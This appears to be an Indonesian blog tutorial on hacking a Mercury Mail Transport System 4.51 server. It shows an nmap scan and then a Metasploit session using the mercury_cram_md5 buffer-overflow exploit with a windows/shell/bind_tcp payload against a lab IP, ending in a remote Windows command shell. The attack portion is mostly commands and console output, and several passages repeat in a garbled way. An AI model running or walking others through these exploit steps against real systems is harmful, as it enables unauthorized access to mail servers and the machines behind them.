Sebelumnya penulis telah mencontohkan bagaimana cara melakukan hacking pada suatu web server dan ftp server untuk mendapatkan shell, saat ini saya akan membahas praktek cara melakukan hacking pada mail server. Fungsi Mail Server digunakan untuk menerima dan menyimpan e-mail yang masuk, nah disini saya akan
mencontohkan bagaimana cara melakukan hack salah satu mail server yang mempunyai celah keamanan Buffer Overflow yaitu Mercury Mail Transport System pada versi 4.51 sehingga kita ahkirnya mendapatkan shell.
mencontohkan bagaimana cara melakukan hack salah satu mail server yang mempunyai celah keamanan Buffer Overflow yaitu Mercury Mail Transport System pada versi 4.51 sehingga kita ahkirnya mendapatkan shell.
Disini IP target adalah 192.168.1.21.
Kita dapat coba scan pakai NMAP untuk mengetahui bahwa target port untuk SMTP yaitu 25 terbuka.
Dengan mengetahui port 25 terbuka itu tidak cukup, kita perlu mengetahuinya lebih jauh. Kita tunggu scan NMAP selesai dan hasilnya adalah :
Yeah ahkirnya kita mengetahui bahwa target menggunakan mail server Mercury, kita lihat dibawahnya pada port 143, ditampil service IMAPnya terlihat ada versi Mercury/32 imapd 4.51.
Kalau sudah mendapatkan informasi yang jelas dari aplikasi mail server target serta versinya, maka kita dapat cari exploitnya dan exploitnya ternyata ada di Metasploit Framework.
Berikut adalah exploitasinya :
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ — –=[ 731 exploits - 372 auxiliary - 80 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13644 updated yesterday (2011.08.26)
+ — –=[ 731 exploits - 372 auxiliary - 80 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13644 updated yesterday (2011.08.26)
[-] Warning: This copy of the Metasploit Framework has been corrupted by an installed anti-virus program.
[-] We recommend that you disable your anti-virus or exclude your Metasploit installation path,
[-] then restore the removed files from quarantine or reinstall the framework. For more info:
[-] https://community.rapid7.com/docs/DOC-1273
[-]
msf exploit(mercury_cram_md5) > use exploit/windows/smtp/mercury_cram_md5
[-] We recommend that you disable your anti-virus or exclude your Metasploit installation path,
[-] then restore the removed files from quarantine or reinstall the framework. For more info:
[-] https://community.rapid7.com/docs/DOC-1273
[-]
msf exploit(mercury_cram_md5) > use exploit/windows/smtp/mercury_cram_md5
Perintah di atas kita memilih exploit mercury_cram_md5
msf exploit(mercury_cram_md5) > set PAYLOAD windows/shell/bind_tcp
Perintah di atas kita memasukkan payloadnya dan payload yang digunakan adalah shell/bind_tcp
msf exploit(mercury_cram_md5) > set RHOST 192.168.1.21
Di atas adalah perintah untuk memasukkan IP target.
msf exploit(mercury_cram_md5) > exploit
Setelah selesai, kita ketik exploit seperti diatas lalu enter.
PAYLOAD => windows/shell/bind_tcp
RHOST => 192.168.1.21
[*] Started bind handler
[*] Trying target Mercury Mail Transport System 4.51…
[*] Sending stage (240 bytes) to 192.168.1.21
[*] Command shell session 1 opened (192.168.1.22:2763 -> 192.168.1.21:4444) at 2011-08-28 06:39:50 -0700
RHOST => 192.168.1.21
[*] Started bind handler
[*] Trying target Mercury Mail Transport System 4.51…
[*] Sending stage (240 bytes) to 192.168.1.21
[*] Command shell session 1 opened (192.168.1.22:2763 -> 192.168.1.21:4444) at 2011-08-28 06:39:50 -0700
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
(C) Copyright 1985-2001 Microsoft Corp.
C:\MERCURY>
Binggo kita mendapatkan shell di komputer target melalui celah pada mail server.
0 komentar:
Posting Komentar